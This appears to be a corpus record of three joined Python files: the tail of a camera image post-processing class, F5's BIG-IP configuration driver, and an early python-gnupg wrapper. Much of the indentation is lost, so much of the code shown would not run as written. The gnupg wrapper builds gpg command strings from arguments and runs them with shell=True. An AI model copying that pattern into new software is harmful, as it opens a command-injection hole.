def enable_undistort(self, balance=0.0, dim2=None, dim3=None):
self.undistort_balance = balance
self.undistort_dim2 = dim2
self.undistort_dim3 = dim3
# allow the caller to load up the required parameters manually
        if self.undistort_dim is not None and self.undistort_k is not None and self.undistort_d is not None:
self.undistort = True
else:
fK, fD = get_fisheye(self.width, self.height)
if fK is not None and fD is not None:
self.undistort_dim = (self.width, self.height)
self.undistort_k = fK
self.undistort_d = fD
self.undistort = True
else:
self.undistort = False
if self.undistort:
self.undistorter = FisheyeUndistorter(self.undistort_dim, self.undistort_k, self.undistort_d, bal=self.undistort_balance, dim2=self.undistort_dim2, dim3=self.undistort_dim3)
self.warper = None # reset the warper
def disable_undistort(self):
self.undistort = False
self.warper = None # reset the warper
def enable_warp(self, horizon=0.0, angle=45, vstretch=1.8):
self.warp = True
self.warp_horizon = horizon
self.warp_angle = angle
self.warp_vstretch = vstretch
self.warper = None
def disable_warp(self):
self.warp = False
self.warper = None
def enable_crop(self, x1, y1, x2=None, y2=None, width=None, height=None):
self.crop_x1 = x1
self.crop_y1 = y1
        if (x2 is not None and width is not None) or (x2 is None and width is None) or (y2 is not None and height is not None) or (y2 is None and height is None):
            self.crop_x1 = None
            self.crop_y1 = None
            raise ValueError("Too many or not enough arguments for cropping")
        else:
            if x2 is not None:
                self.crop_x2 = x2
            else:
                self.crop_x2 = x1 + width
            if y2 is not None:
                self.crop_y2 = y2
            else:
                self.crop_y2 = y1 + height
def disable_crop(self):
self.crop_x1 = None
self.crop_y1 = None
self.crop_x2 = None
self.crop_y2 = None
def post_process_image(self, img):
        if self.undistort and self.undistorter is not None:
            img = self.undistorter.undistort_image(img)
        if self.warp:
            if self.warper is None:
                self.warper = PerspectiveUndistorter(img.shape[1], img.shape[0], horizon=self.warp_horizon, angle=self.warp_angle, vstretch=self.warp_vstretch)
            img = self.warper.undistort_image(img)
        if self.crop_x1 is not None and self.crop_y1 is not None and self.crop_x2 is not None and self.crop_y2 is not None:
            img = img[self.crop_y1:self.crop_y2, self.crop_x1:self.crop_x2]
return img
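
# Minimal usage sketch (illustrative addition, not part of the original module). It
# assumes a Jetson-style CSI camera reachable through the nvarguscamerasrc pipeline
# built in _gst_str(), and a fisheye calibration that sloth.undistort.get_fisheye()
# can locate; without a calibration, enable_undistort() simply leaves frames untouched.
if __name__ == '__main__':
    import time

    camera = Camera(width=224, height=224, fps=21)      # autostart=True spawns the capture thread
    camera.enable_undistort(balance=0.5)
    camera.enable_crop(10, 10, width=200, height=200)   # crop region given as origin + size
    try:
        for _ in range(5):
            time.sleep(1.0)
            frame = camera.value                         # latest post-processed BGR frame (numpy array)
            print('frame shape:', frame.shape)
    finally:
        camera.stop()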
|
bigipconfigdriver.py
|
#!/usr/bin/env python
# Copyright (c) 2016-2018, F5 Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import argparse
import fcntl
import hashlib
import json
import logging
import os
import os.path
import signal
import sys
import threading
import time
import traceback
import pyinotify
from urlparse import urlparse
from f5_cccl.api import F5CloudServiceManager
from f5_cccl.exceptions import F5CcclError
from f5_cccl.utils.mgmt import mgmt_root
from f5_cccl.utils.profile import (delete_unused_ssl_profiles,
create_client_ssl_profile,
create_server_ssl_profile)
log = logging.getLogger(__name__)
console = logging.StreamHandler()
console.setFormatter(
logging.Formatter("[%(asctime)s %(name)s %(levelname)s] %(message)s"))
root_logger = logging.getLogger()
root_logger.addHandler(console)
class ResponseStatusFilter(logging.Filter):
def filter(self, record):
return not record.getMessage().startswith("RESPONSE::STATUS")
class CertFilter(logging.Filter):
def filter(self, record):
return "CERTIFICATE" not in record.getMessage()
class KeyFilter(logging.Filter):
def filter(self, record):
return "PRIVATE KEY" not in record.getMessage()
root_logger.addFilter(ResponseStatusFilter())
root_logger.addFilter(CertFilter())
root_logger.addFilter(KeyFilter())
DEFAULT_LOG_LEVEL = logging.INFO
DEFAULT_VERIFY_INTERVAL = 30.0
NET_SCHEMA_NAME = 'cccl-net-api-schema.yml'
class CloudServiceManager():
"""CloudServiceManager class.
Applies a configuration to a BigIP
Args:
bigip: ManagementRoot object
partition: BIG-IP partition to manage
"""
def __init__(self, bigip, partition, user_agent=None, prefix=None,
schema_path=None):
"""Initialize the CloudServiceManager object."""
self._mgmt_root = bigip
self._schema = schema_path
self._cccl = F5CloudServiceManager(
bigip,
partition,
user_agent=user_agent,
prefix=prefix,
schema_path=schema_path)
def mgmt_root(self):
""" Return the BIG-IP ManagementRoot object"""
return self._mgmt_root
def get_partition(self):
""" Return the managed partition."""
return self._cccl.get_partition()
def get_schema_type(self):
"""Return 'ltm' or 'net', based on schema type."""
if self._schema is None:
return 'ltm'
elif 'net' in self._schema:
return 'net'
def _apply_ltm_config(self, config):
"""Apply the ltm configuration to the BIG-IP.
Args:
config: BIG-IP config dict
"""
return self._cccl.apply_ltm_config(config)
def _apply_net_config(self, config):
"""Apply the net configuration to the BIG-IP."""
return self._cccl.apply_net_config(config)
def get_proxy(self):
"""Called from 'CCCL' delete_unused_ssl_profiles"""
return self._cccl.get_proxy()
class IntervalTimerError(Exception):
def __init__(self, msg):
Exception.__init__(self, msg)
class IntervalTimer(object):
def __init__(self, interval, cb):
float(interval)
if 0 >= interval:
raise IntervalTimerError("interval must be greater than 0")
if not cb or not callable(cb):
raise IntervalTimerError("cb must be callable object")
self._cb = cb
self._interval = interval
self._execution_time = 0.0
self._running = False
self._timer = None
self._lock = threading.RLock()
def _set_execution_time(self, start_time, stop_time):
if stop_time >= start_time:
self._execution_time = stop_time - start_time
else:
self._execution_time = 0.0
def _adjust_interval(self):
adjusted_interval = self._interval - self._execution_time
if adjusted_interval < 0.0:
adjusted_interval = 0.0
self._execution_time = 0.0
return adjusted_interval
def _run(self):
start_time = time.clock()
try:
self._cb()
except Exception:
log.exception('Unexpected error')
finally:
with self._lock:
stop_time = time.clock()
self._set_execution_time(start_time, stop_time)
if self._running:
self.start()
def is_running(self):
return self._running
def start(self):
with self._lock:
if self._running:
# restart timer, possibly with a new interval
self.stop()
self._timer = threading.Timer(self._adjust_interval(), self._run)
# timers can't be stopped, cancel just prevents the callback from
            # occurring when the timer finally expires. Making it a daemon allows
# cancelled timers to exit eventually without a need for join.
self._timer.daemon = True
self._timer.start()
self._running = True
def stop(self):
with self._lock:
if self._running:
self._timer.cancel()
self._timer = None
self._running = False
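# Usage sketch (illustrative, not part of the original driver): _run() re-arms the
# timer after each callback, so a single start() yields a recurring callback whose
# period is the configured interval minus the callback's own execution time:
#
#     timer = IntervalTimer(30.0, handler.notify_reset)
#     timer.start()    # notify_reset() fires roughly every 30 seconds
#     ...
#     timer.stop()     # cancels the pending threading.Timer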
class ConfigError(Exception):
def __init__(self, msg):
Exception.__init__(self, msg)
def create_ltm_config(partition, config):
"""Extract a BIG-IP configuration from the LTM configuration.
Args:
config: BigIP config
"""
ltm = {}
if 'resources' in config and partition in config['resources']:
ltm = config['resources'][partition]
return ltm
def create_network_config(config):
"""Extract a BIG-IP Network configuration from the network config.
Args:
config: BigIP config which contains vxlan defs
"""
net = {}
if 'vxlan-fdb' in config:
net['userFdbTunnels'] = [config['vxlan-fdb']]
if ('vxlan-arp' in config and 'arps' in config['vxlan-arp']
and config['vxlan-arp']['arps'] is not None):
net['arps'] = config['vxlan-arp']['arps']
log.debug("NET Config: %s", json.dumps(net))
return net
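# For reference, a hedged sketch of the config fragment create_network_config() and
# _handle_vxlan_config() (below) expect; the field values are illustrative only and
# inferred from the code, not from any particular controller release:
#
#     {
#         "vxlan-fdb": {"name": "<tunnel name>", "records": [...]},
#         "vxlan-arp": {"arps": [...]}
#     }
#
# The 'vxlan-fdb' object becomes the single entry of net['userFdbTunnels'], and the
# 'arps' list is copied into net['arps'] when it is present and non-null.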
def _create_custom_profiles(mgmt, partition, custom_profiles):
incomplete = 0
# Server profiles may reference a CA cert in another server profile.
# These need to be loaded first.
for profile in custom_profiles:
caFile = profile.get('caFile', '')
if profile['context'] == 'serverside' and caFile == "self":
incomplete += create_server_ssl_profile(mgmt, partition, profile)
for profile in custom_profiles:
if profile['context'] == 'clientside':
incomplete += create_client_ssl_profile(mgmt, partition, profile)
elif profile['context'] == 'serverside':
caFile = profile.get('caFile', '')
if caFile != "self":
incomplete += create_server_ssl_profile(
mgmt, partition, profile)
else:
log.error(
"Only client or server custom profiles are supported.")
return incomplete
def _delete_unused_ssl_profiles(mgr, partition, config):
return delete_unused_ssl_profiles(mgr, partition, config)
class ConfigHandler():
def __init__(self, config_file, managers, verify_interval):
self._config_file = config_file
self._managers = managers
self._condition = threading.Condition()
self._thread = threading.Thread(target=self._do_reset)
self._pending_reset = False
self._stop = False
self._backoff_time = 1
self._backoff_timer = None
self._max_backoff_time = 128
self._verify_interval = verify_interval
self._interval = IntervalTimer(self._verify_interval,
self.notify_reset)
self._thread.start()
def stop(self):
self._condition.acquire()
self._stop = True
self._condition.notify()
self._condition.release()
if self._backoff_timer is not None:
self.cleanup_backoff()
def notify_reset(self):
self._condition.acquire()
self._pending_reset = True
self._condition.notify()
self._condition.release()
def _do_reset(self):
log.debug('config handler thread start')
with self._condition:
while True:
self._condition.acquire()
if not self._pending_reset and not self._stop:
self._condition.wait()
log.debug('config handler woken for reset')
self._pending_reset = False
self._condition.release()
if self._stop:
log.info('stopping config handler')
if self._backoff_timer is not None:
self.cleanup_backoff()
break
start_time = time.time()
incomplete = 0
try:
config = _parse_config(self._config_file)
# No 'resources' indicates that the controller is not
# yet ready -- it does not mean to apply an empty config
if 'resources' not in config:
continue
incomplete = self._update_cccl(config)
except ValueError:
formatted_lines = traceback.format_exc().splitlines()
last_line = formatted_lines[-1]
log.error('Failed to process the config file {} ({})'
.format(self._config_file, last_line))
incomplete = 1
except Exception:
log.exception('Unexpected error')
incomplete = 1
if incomplete:
# Error occurred, perform retries
self.handle_backoff()
else:
if (self._interval and self._interval.is_running()
is False):
self._interval.start()
self._backoff_time = 1
if self._backoff_timer is not None:
self.cleanup_backoff()
perf_enable = os.environ.get('SCALE_PERF_ENABLE')
if perf_enable: # pragma: no cover
test_data = {}
app_count = 0
backend_count = 0
for service in config['resources']['test'][
'virtualServers']:
app_count += 1
backends = 0
for pool in config['resources']['test']['pools']:
if service['name'] in pool['name']:
backends = len(pool['members'])
break
test_data[service['name']] = backends
backend_count += backends
test_data['Total_Services'] = app_count
test_data['Total_Backends'] = backend_count
test_data['Time'] = time.time()
json_data = json.dumps(test_data)
log.info('SCALE_PERF: Test data: %s',
json_data)
log.debug('updating tasks finished, took %s seconds',
time.time() - start_time)
if self._interval:
self._interval.stop()
def _update_cccl(self, config):
_handle_vxlan_config(config)
cfg_net = create_network_config(config)
incomplete = 0
for mgr in self._managers:
partition = mgr.get_partition()
cfg_ltm = create_ltm_config(partition, config)
try:
# Manually create custom profiles;
# CCCL doesn't yet do this
if 'customProfiles' in cfg_ltm and \
mgr.get_schema_type() == 'ltm':
tmp = 0
tmp = _create_custom_profiles(
mgr.mgmt_root(),
partition,
cfg_ltm['customProfiles'])
incomplete += tmp
# Apply the BIG-IP config after creating profiles
# and before deleting profiles
if mgr.get_schema_type() == 'net':
incomplete += mgr._apply_net_config(cfg_net)
else:
incomplete += mgr._apply_ltm_config(cfg_ltm)
# Manually delete custom profiles (if needed)
if mgr.get_schema_type() == 'ltm':
_delete_unused_ssl_profiles(
mgr,
partition,
cfg_ltm)
except F5CcclError as e:
# We created an invalid configuration, raise the
# exception and fail
log.error("CCCL Error: %s", e.msg)
incomplete += 1
return incomplete
def cleanup_backoff(self):
"""Cleans up canceled backoff timers."""
self._backoff_timer.cancel()
self._backoff_timer.join()
self._backoff_timer = None
def handle_backoff(self):
"""Wrapper for calls to retry_backoff."""
if (self._interval and self._interval.is_running() is
True):
self._interval.stop()
if self._backoff_timer is None:
self.retry_backoff()
def retry_backoff(self):
"""Add a backoff timer to retry in case of failure."""
def timer_cb():
self._backoff_timer = None
self.notify_reset()
self._backoff_timer = threading.Timer(
self._backoff_time, timer_cb
)
log.error("Error applying config, will try again in %s seconds",
self._backoff_time)
self._backoff_timer.start()
if self._backoff_time < self._max_backoff_time:
self._backoff_time *= 2
class ConfigWatcher(pyinotify.ProcessEvent):
def __init__(self, config_file, on_change):
basename = os.path.basename(config_file)
if not basename or 0 == len(basename):
raise ConfigError('config_file must be a file path')
self._config_file = config_file
self._on_change = on_change
self._config_dir = os.path.dirname(self._config_file)
self._config_stats = None
if os.path.exists(self._config_file):
try:
self._config_stats = self._digest()
except IOError as ioe:
log.warning('ioerror during sha sum calculation: {}'.
format(ioe))
self._running = False
self._polling = False
self._user_abort = False
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
self._user_abort = True
self._running = False
def _loop_check(self, notifier):
if self._polling:
log.debug('inotify loop ended - returning to polling mode')
return True
else:
return False
def loop(self):
self._running = True
if not os.path.exists(self._config_dir):
log.info(
'configured directory doesn\'t exist {}, entering poll loop'.
format(self._config_dir))
self._polling = True
while self._running:
try:
while self._polling:
if self._polling:
if os.path.exists(self._config_dir):
log.debug('found watchable directory - {}'.format(
self._config_dir))
self._polling = False
break
else:
log.debug('waiting for watchable directory - {}'.
format(self._config_dir))
time.sleep(1)
_wm = pyinotify.WatchManager()
_notifier = pyinotify.Notifier(_wm, default_proc_fun=self)
_notifier.coalesce_events(True)
mask = (pyinotify.IN_CREATE | pyinotify.IN_DELETE |
pyinotify.IN_MOVED_FROM | pyinotify.IN_MOVED_TO |
pyinotify.IN_CLOSE_WRITE | pyinotify.IN_MOVE_SELF |
pyinotify.IN_DELETE_SELF)
_wm.add_watch(
path=self._config_dir,
mask=mask,
quiet=False,
exclude_filter=lambda path: False)
log.info('entering inotify loop to watch {}'.format(
self._config_file))
_notifier.loop(callback=self._loop_check)
if (not self._polling and _notifier._fd is None):
log.info('terminating')
self._running = False
except Exception as e:
log.warning(e)
if self._user_abort:
log.info('Received user kill signal, terminating.')
def _digest(self):
sha = hashlib.sha256()
with open(self._config_file, 'rb') as f:
fcntl.lockf(f.fileno(), fcntl.LOCK_SH, 0, 0, 0)
while True:
buf = f.read(4096)
if not buf:
break
sha.update(buf)
fcntl.lockf(f.fileno(), fcntl.LOCK_UN, 0, 0, 0)
return sha.digest()
def _should_watch(self, pathname):
if pathname == self._config_file:
return True
return False
def _is_changed(self):
changed = False
cur_hash = None
if not os.path.exists(self._config_file):
if cur_hash != self._config_stats:
changed = True
else:
changed = False
else:
try:
cur_hash = self._digest()
if cur_hash != self._config_stats:
changed = True
else:
changed = False
except IOError as ioe:
log.warning('ioerror during sha sum calculation: {}'.
format(ioe))
return (changed, cur_hash)
def process_default(self, event):
if (pyinotify.IN_DELETE_SELF == event.mask or
pyinotify.IN_MOVE_SELF == event.mask):
log.warn(
'watchpoint {} has been moved or destroyed, using poll loop'.
format(self._config_dir))
self._polling = True
if self._config_stats is not None:
log.debug('config file {} changed, parent gone'.format(
self._config_file))
self._config_stats = None
self._on_change()
if self._should_watch(event.pathname):
(changed, sha) = self._is_changed()
if changed:
log.debug('config file {0} changed - signalling bigip'.format(
self._config_file, self._config_stats, sha))
self._config_stats = sha
self._on_change()
def _parse_config(config_file):
def _file_exist_cb(log_success):
if os.path.exists(config_file):
if log_success:
log.info('Config file: {} found'.format(config_file))
return (True, None)
else:
return (False, 'Waiting for config file {}'.format(config_file))
_retry_backoff(_file_exist_cb)
with open(config_file, 'r') as config:
fcntl.lockf(config.fileno(), fcntl.LOCK_SH, 0, 0, 0)
data = config.read()
fcntl.lockf(config.fileno(), fcntl.LOCK_UN, 0, 0, 0)
config_json = json.loads(data)
log.debug('loaded configuration file successfully')
return config_json
def _handle_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'--config-file',
type=str,
required=True,
help='BigIp configuration file')
parser.add_argument(
'--ctlr-prefix',
type=str,
required=True,
help='Controller name prefix'
)
args = parser.parse_args()
basename = os.path.basename(args.config_file)
if not basename or 0 == len(basename):
raise ConfigError('must provide a file path')
args.config_file = os.path.realpath(args.config_file)
return args
def _handle_global_config(config):
level = DEFAULT_LOG_LEVEL
verify_interval = DEFAULT_VERIFY_INTERVAL
if config and 'global' in config:
global_cfg = config['global']
if 'log-level' in global_cfg:
log_level = global_cfg['log-level']
try:
level = logging.getLevelName(log_level.upper())
except (AttributeError):
log.warn('The "global:log-level" field in the configuration '
'file should be a string')
if 'verify-interval' in global_cfg:
try:
verify_interval = float(global_cfg['verify-interval'])
if verify_interval < 0:
verify_interval = DEFAULT_VERIFY_INTERVAL
log.warn('The "global:verify-interval" field in the '
'configuration file should be a non-negative '
'number')
except (ValueError):
log.warn('The "global:verify-interval" field in the '
'configuration file should be a number')
vxlan_partition = global_cfg.get('vxlan-partition')
try:
root_logger.setLevel(level)
if level > logging.DEBUG:
logging.getLogger('requests.packages.urllib3.'
'connectionpool').setLevel(logging.WARNING)
except:
level = DEFAULT_LOG_LEVEL
root_logger.setLevel(level)
if level > logging.DEBUG:
logging.getLogger('requests.packages.urllib3.'
'connectionpool').setLevel(logging.WARNING)
log.warn('Undefined value specified for the '
'"global:log-level" field in the configuration file')
# level only is needed for unit tests
return verify_interval, level, vxlan_partition
def _handle_bigip_config(config):
if (not config) or ('bigip' not in config):
raise ConfigError('Configuration file missing "bigip" section')
bigip = config['bigip']
if 'username' not in bigip:
raise ConfigError('Configuration file missing '
'"bigip:username" section')
if 'password' not in bigip:
raise ConfigError('Configuration file missing '
'"bigip:password" section')
if 'url' not in bigip:
raise ConfigError('Configuration file missing "bigip:url" section')
if ('partitions' not in bigip) or (len(bigip['partitions']) == 0):
raise ConfigError('Configuration file must specify at least one '
'partition in the "bigip:partitions" section')
url = urlparse(bigip['url'])
host = url.hostname
port = url.port
if not port:
port = 443
return host, port
def _handle_vxlan_config(config):
if config and 'vxlan-fdb' in config:
fdb = config['vxlan-fdb']
if 'name' not in fdb:
raise ConfigError('Configuration file missing '
'"vxlan-fdb:name" section')
if 'records' not in fdb:
raise ConfigError('Configuration file missing '
'"vxlan-fdb:records" section')
if config and 'vxlan-arp' in config:
arp = config['vxlan-arp']
if 'arps' not in arp:
raise ConfigError('Configuration file missing '
'"vxlan-arp:arps" section')
def _set_user_agent(prefix):
try:
with open('/app/vendor/src/f5/VERSION_BUILD.json', 'r') \
as version_file:
data = json.load(version_file)
user_agent = \
prefix + "-bigip-ctlr-" + data['version'] + '-' + data['build']
except Exception as e:
user_agent = prefix + "-bigip-ctlr-VERSION-UNKNOWN"
log.error("Could not read version file: %s", e)
return user_agent
def _retry_backoff(cb):
RETRY_INTERVAL = 1
log_interval = 0.5
elapsed = 0.5
log_success = False
while 1:
if log_interval > 0.5:
log_success = True
(success, val) = cb(log_success)
if success:
return val
if elapsed == log_interval:
elapsed = 0
log_interval *= 2
log.error("Encountered error: {}. Retrying for {} seconds.".format(
val, int(log_interval)
))
time.sleep(RETRY_INTERVAL)
elapsed += RETRY_INTERVAL
def _find_net_schema():
paths = [path for path in sys.path if 'site-packages' in path]
for path in paths:
for root, dirs, files in os.walk(path):
if NET_SCHEMA_NAME in files:
return os.path.join(root, NET_SCHEMA_NAME)
for root, dirs, files in os.walk('/app/src/f5-cccl'):
if NET_SCHEMA_NAME in files:
return os.path.join(root, NET_SCHEMA_NAME)
log.info('Could not find CCCL schema: {}'.format(NET_SCHEMA_NAME))
return ''
def main():
try:
args = _handle_args()
config = _parse_config(args.config_file)
verify_interval, _, vxlan_partition = _handle_global_config(config)
host, port = _handle_bigip_config(config)
# FIXME (kenr): Big-IP settings are currently static (we ignore any
# changes to these fields in subsequent updates). We
# may want to make the changes dynamic in the future.
# BIG-IP to manage
def _bigip_connect_cb(log_success):
try:
bigip = mgmt_root(
host,
config['bigip']['username'],
config['bigip']['password'],
port,
"tmos")
if log_success:
log.info('BIG-IP connection established.')
return (True, bigip)
except Exception, e:
return (False, 'BIG-IP connection error: {}'.format(e))
bigip = _retry_backoff(_bigip_connect_cb)
# Read version and build info, set user-agent for ICR session
user_agent = _set_user_agent(args.ctlr_prefix)
managers = []
for partition in config['bigip']['partitions']:
# Management for the BIG-IP partitions
manager = CloudServiceManager(
bigip,
partition,
user_agent=user_agent)
managers.append(manager)
if vxlan_partition:
# Management for net resources (VXLAN)
manager = CloudServiceManager(
bigip,
vxlan_partition,
user_agent=user_agent,
prefix=args.ctlr_prefix,
schema_path=_find_net_schema())
managers.append(manager)
handler = ConfigHandler(args.config_file,
managers,
verify_interval)
if os.path.exists(args.config_file):
handler.notify_reset()
watcher = ConfigWatcher(args.config_file, handler.notify_reset)
watcher.loop()
handler.stop()
except (IOError, ValueError, ConfigError) as e:
log.error(e)
sys.exit(1)
except Exception:
log.exception('Unexpected error')
sys.exit(1)
return 0
if __name__ == "__main__":
main()
|
gnupg.py
|
""" A wrapper for the 'gpg' command::
Portions of this module are derived from A.M. Kuchling's well-designed
GPG.py, using Richard Jones' updated version 1.3, which can be found
in the pycrypto CVS repository on Sourceforge:
http://pycrypto.cvs.sourceforge.net/viewvc/pycrypto/gpg/GPG.py
This module is *not* forward-compatible with amk's; some of the
old interface has changed. For instance, since I've added decrypt
functionality, I elected to initialize with a 'gnupghome' argument
instead of 'keyring', so that gpg can find both the public and secret
keyrings. I've also altered some of the returned objects in order for
the caller to not have to know as much about the internals of the
result classes.
While the rest of ISconf is released under the GPL, I am releasing
this single file under the same terms that A.M. Kuchling used for
pycrypto.
Steve Traugott, stevegt@terraluna.org
Thu Jun 23 21:27:20 PDT 2005
This version of the module has been modified from Steve Traugott's version
(see http://trac.t7a.org/isconf/browser/trunk/lib/python/isconf/GPG.py) by
Vinay Sajip to make use of the subprocess module (Steve's version uses os.fork()
and so does not work on Windows). Renamed to gnupg.py to avoid confusion with
the previous versions.
Modifications Copyright (C) 2008-2010 Vinay Sajip. All rights reserved.
A unittest harness (test_gnupg.py) has also been added.
"""
__author__ = "Vinay Sajip"
__date__ = "$01-Mar-2010 12:29:29$"
try:
from io import StringIO
from io import TextIOWrapper
from io import BufferedReader
from io import BufferedWriter
except ImportError:
from cStringIO import StringIO
class BufferedReader: pass
class BufferedWriter: pass
import locale
import logging
import os
import socket
from subprocess import Popen
from subprocess import PIPE
import threading
import tempfile
import shutil
try:
    from logging import NullHandler
except ImportError:
class NullHandler(logging.Handler):
def emit(self, record):
pass
logger = logging.getLogger(__name__)
if not logger.handlers:
logger.addHandler(NullHandler())
def _copy_data(instream, outstream):
# Copy one stream to another
sent = 0
while True:
data = instream.read(1024)
if len(data) == 0:
break
sent += len(data)
logger.debug("sending chunk (%d): %r", sent, data[:256])
try:
outstream.write(data)
except:
# Can sometimes get 'broken pipe' errors even when the data has all
# been sent
logger.exception('Error sending data')
break
outstream.close()
logger.debug("closed output, %d bytes sent", sent)
def _threaded_copy_data(instream, outstream):
wr = threading.Thread(target=_copy_data, args=(instream, outstream))
wr.setDaemon(True)
logger.debug('data copier: %r, %r, %r', wr, instream, outstream)
wr.start()
return wr
def _write_passphrase(stream, passphrase):
stream.write(passphrase)
logger.debug("Wrote passphrase")
def _is_sequence(instance):
return isinstance(instance,list) or isinstance(instance,tuple)
def _wrap_input(inp):
if isinstance(inp, BufferedWriter):
oldinp = inp
inp = TextIOWrapper(inp)
logger.debug('wrapped input: %r -> %r', oldinp, inp)
return inp
def _wrap_output(outp):
if isinstance(outp, BufferedReader):
oldoutp = outp
outp = TextIOWrapper(outp)
logger.debug('wrapped output: %r -> %r', oldoutp, outp)
return outp
#The following is needed for Python2.7 :-(
def _make_file(s):
try:
rv = StringIO(s)
except TypeError:
from io import BytesIO
rv = BytesIO(s)
return rv
class GPG(object):
"Encapsulate access to the gpg executable"
def __init__(self, gpgbinary='gpg', gnupghome=None, verbose=False):
"""Initialize a GPG process wrapper. Options are:
gpgbinary -- full pathname for GPG binary.
gnupghome -- full pathname to where we can find the public and
private keyrings. Default is whatever gpg defaults to.
"""
self.gpgbinary = gpgbinary
self.gnupghome = gnupghome
self.verbose = verbose
self.encoding = locale.getpreferredencoding()
if gnupghome and not os.path.isdir(self.gnupghome):
os.makedirs(self.gnupghome,0x1C0)
p = self._open_subprocess(["--version"])
result = Verify() # any result will do for this
self._collect_output(p, result)
if p.returncode != 0:
raise ValueError("Error invoking gpg: %s: %s" % (p.returncode,
result.stderr))
def _open_subprocess(self, args, passphrase=False):
# Internal method: open a pipe to a GPG subprocess and return
# the file objects for communicating with it.
cmd = [self.gpgbinary, '--status-fd 2 --no-tty']
if self.gnupghome:
cmd.append('--homedir "%s" ' % self.gnupghome)
if passphrase:
cmd.append('--batch --passphrase-fd 0')
cmd.extend(args)
cmd = ' '.join(cmd)
if self.verbose:
print(cmd)
logger.debug("%s", cmd)
return Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
def _read_response(self, stream, result):
# Internal method: reads all the output from GPG, taking notice
# only of lines that begin with the magic [GNUPG:] prefix.
#
# Calls methods on the response object for each valid token found,
# with the arg being the remainder of the status line.
lines = []
while True:
line = stream.readline()
lines.append(line)
if self.verbose:
print(line)
logger.debug("%s", line.rstrip())
if line == "": break
line = line.rstrip()
if line[0:9] == '[GNUPG:] ':
# Chop off the prefix
line = line[9:]
L = line.split(None, 1)
keyword = L[0]
if len(L) > 1:
value = L[1]
else:
value = ""
result.handle_status(keyword, value)
result.stderr = ''.join(lines)
def _read_data(self, stream, result):
# Read the contents of the file from GPG's stdout
chunks = []
while True:
data = stream.read(1024)
if data == "":
break
logger.debug("chunk: %r" % data[:256])
chunks.append(data)
result.data = ''.join(chunks)
def _collect_output(self, process, result, writer=None):
"""
        Drain the subprocess's output streams, writing the collected output
to the result. If a writer thread (writing to the subprocess) is given,
make sure it's joined before returning.
"""
stderr = _wrap_output(process.stderr)
rr = threading.Thread(target=self._read_response, args=(stderr, result))
rr.setDaemon(True)
logger.debug('stderr reader: %r', rr)
rr.start()
stdout = _wrap_output(process.stdout)
dr = threading.Thread(target=self._read_data, args=(stdout, result))
dr.setDaemon(True)
logger.debug('stdout reader: %r', dr)
dr.start()
dr.join()
rr.join()
if writer is not None:
writer.join()
process.wait()
def _handle_io(self, args, file, result, passphrase=None):
"Handle a call to GPG - pass input data, collect output data"
# Handle a basic data call - pass data to GPG, handle the output
# including status information. Garbage In, Garbage Out :)
p = self._open_subprocess(args, passphrase is not None)
if not isinstance(file, BufferedReader):
stdin = _wrap_input(p.stdin)
else:
stdin = p.stdin
if passphrase:
passphrase += '\n'
if stdin is p.stdin:
passphrase = passphrase.encode(self.encoding)
_write_passphrase(stdin, passphrase)
writer = _threaded_copy_data(file, stdin)
self._collect_output(p, result, writer)
return result
#
# SIGNATURE METHODS
#
def sign(self, message, **kwargs):
"""sign message"""
return self.sign_file(_make_file(message), **kwargs)
def sign_file(self, file, keyid=None, passphrase=None, clearsign=True):
"""sign file"""
args = ["-sa"]
if clearsign:
args.append("--clearsign")
if keyid:
args.append("--default-key %s" % keyid)
result = Sign()
#We could use _handle_io here except for the fact that if the
#passphrase is bad, gpg bails and you can't write the message.
#self._handle_io(args, _make_file(message), result, passphrase=passphrase)
p = self._open_subprocess(args, passphrase is not None)
try:
stdin = _wrap_input(p.stdin)
if passphrase:
passphrase += '\n'
_write_passphrase(stdin, passphrase)
writer = _threaded_copy_data(file, stdin)
except IOError:
logging.exception("error writing message")
writer = None
self._collect_output(p, result, writer)
return result
def verify(self, data):
"""Verify the signature on the contents of the string 'data'
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input(Passphrase='foo')
>>> key = gpg.gen_key(input)
>>> assert key
>>> sig = gpg.sign('hello',keyid=key.fingerprint,passphrase='bar')
>>> assert not sig
>>> sig = gpg.sign('hello',keyid=key.fingerprint,passphrase='foo')
>>> assert sig
>>> verify = gpg.verify(str(sig))
>>> assert verify
"""
return self.verify_file(_make_file(data))
def verify_file(self, file):
"Verify the signature on the contents of the file-like object 'file'"
result = Verify()
self._handle_io(['--verify'], file, result)
return result
#
# KEY MANAGEMENT
#
def import_keys(self, key_data):
""" import the key_data into our keyring
>>> import shutil
>>> shutil.rmtree("keys")
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input()
>>> result = gpg.gen_key(input)
>>> print1 = result.fingerprint
>>> result = gpg.gen_key(input)
>>> print2 = result.fingerprint
>>> pubkey1 = gpg.export_keys(print1)
>>> seckey1 = gpg.export_keys(print1,secret=True)
>>> seckeys = gpg.list_keys(secret=True)
>>> pubkeys = gpg.list_keys()
>>> assert print1 in seckeys.fingerprints
>>> assert print1 in pubkeys.fingerprints
>>> str(gpg.delete_keys(print1))
'Must delete secret key first'
>>> str(gpg.delete_keys(print1,secret=True))
'ok'
>>> str(gpg.delete_keys(print1))
'ok'
>>> str(gpg.delete_keys("nosuchkey"))
'No such key'
>>> seckeys = gpg.list_keys(secret=True)
>>> pubkeys = gpg.list_keys()
>>> assert not print1 in seckeys.fingerprints
>>> assert not print1 in pubkeys.fingerprints
>>> result = gpg.import_keys('foo')
>>> assert not result
>>> result = gpg.import_keys(pubkey1)
>>> pubkeys = gpg.list_keys()
>>> seckeys = gpg.list_keys(secret=True)
>>> assert not print1 in seckeys.fingerprints
>>> assert print1 in pubkeys.fingerprints
>>> result = gpg.import_keys(seckey1)
>>> assert result
>>> seckeys = gpg.list_keys(secret=True)
>>> pubkeys = gpg.list_keys()
>>> assert print1 in seckeys.fingerprints
>>> assert print1 in pubkeys.fingerprints
